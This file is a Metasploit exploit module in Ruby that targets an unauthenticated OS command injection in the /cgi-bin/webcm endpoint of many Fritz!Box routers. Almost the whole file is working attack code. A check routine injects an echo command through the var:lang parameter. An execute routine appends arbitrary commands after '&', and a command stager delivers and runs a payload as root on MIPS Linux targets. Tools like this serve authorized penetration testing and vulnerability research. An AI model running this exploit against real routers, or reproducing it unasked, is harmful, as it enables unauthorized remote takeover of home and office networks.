## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Fritz!Box Webcm Unauthenticated Command Injection', 'Description' => %q{ Different Fritz!Box devices are vulnerable to an unauthenticated OS command injection. This module was tested on a Fritz!Box 7270 from the LAN side. The vendor reported the following devices vulnerable: 7570, 7490, 7390, 7360, 7340, 7330, 7272, 7270, 7170 Annex A A/CH, 7170 Annex B English, 7170 Annex A English, 7140, 7113, 6840 LTE, 6810 LTE, 6360 Cable, 6320 Cable, 5124, 5113, 3390, 3370, 3272, 3270 }, 'Author' => [ 'Unknown', # Vulnerability discovery 'Fabian Braeunlein ', # Metasploit PoC with wget method 'Michael Messner ' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '103289' ], [ 'BID', '65520' ], [ 'URL', 'http://www.kapple.de/?p=75' ], # vulnerability details with PoC [ 'URL', 'https://www.speckmarschall.de/hoere.htm' ], # probably the first published details (now censored) [ 'URL', 'http://pastebin.com/GnMKGmZ2' ], # published details uncensored from speckmarschall [ 'URL', 'http://www.avm.de/en/Sicherheit/update_list.html' ], # vendor site with a list of vulnerable devices [ 'URL', 'http://breaking.systems/blog/2014/04/avm-fritzbox-root-rce-from-patch-to-metasploit-module-ii' ] # writeup with PoC ], 'DisclosureDate' => 'Feb 11 2014', 'Privileged' => true, 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'MIPS Little Endian', { 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', { 'Platform' => 'linux', 'Arch' => ARCH_MIPS } ], ], 'DefaultTarget' => 0 )) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end def check begin clue = Rex::Text::rand_text_alpha(rand(5) + 5) res = send_request_cgi({ 'uri' => '/cgi-bin/webcm', 'method' => 'GET', 'vars_get' => { "var:lang" => "&echo -e \"\\n\\n#{clue}\"" } }) if res && res.body =~ /#{clue}/ return Exploit::CheckCode::Vulnerable end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe end def execute_command(cmd, opts) begin res = send_request_cgi({ 'uri' => '/cgi-bin/webcm', 'method' => 'GET', 'vars_get' => { "var:lang" => "&#{cmd}", } }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def exploit print_status("#{peer} - Trying to access the vulnerable URL...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 92 ) end end